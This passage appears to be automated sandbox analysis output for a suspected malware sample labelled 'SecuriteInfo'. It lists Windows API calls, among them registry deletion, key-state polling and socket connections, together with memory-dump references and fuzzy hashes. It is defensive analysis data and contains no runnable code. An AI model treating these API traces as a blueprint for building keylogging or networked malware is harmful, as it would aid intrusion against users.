                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 3488606520-0
                                                                        • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                        • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 15295421-0
                                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 3539004672-0
                                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                        APIs
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                        • String ID:
                                                                        • API String ID: 327565842-0
                                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                        • String ID:
                                                                        • API String ID: 2832842796-0
                                                                        • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                        • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 2095303065-0
                                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: RectWindow
                                                                        • String ID:
                                                                        • API String ID: 861336768-0
                                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 00449598
                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                        • _wcslen.LIBCMT ref: 0044960D
                                                                        • _wcslen.LIBCMT ref: 0044961A
                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                                        • String ID:
                                                                        • API String ID: 1856069659-0
                                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                        • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CursorMenuPopupTrack$Proc
                                                                        • String ID:
                                                                        • API String ID: 1300944170-0
                                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1822080540-0
                                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                        • String ID:
                                                                        • API String ID: 659298297-0
                                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                        APIs
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(00981C48,000000F1,00000000,00000000), ref: 00440E6E
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(00981C48,000000F1,00000001,00000000), ref: 00440E9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableMessageSend$LongShow
                                                                        • String ID:
                                                                        • API String ID: 142311417-0
                                                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                        • _wcslen.LIBCMT ref: 004458FB
                                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3087257052-0
                                                                        • Opcode ID: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                                                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                        • Opcode Fuzzy Hash: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                                                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                        APIs
                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                        • closesocket.WSOCK32(00000000), ref: 00465481
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 245547762-0
                                                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
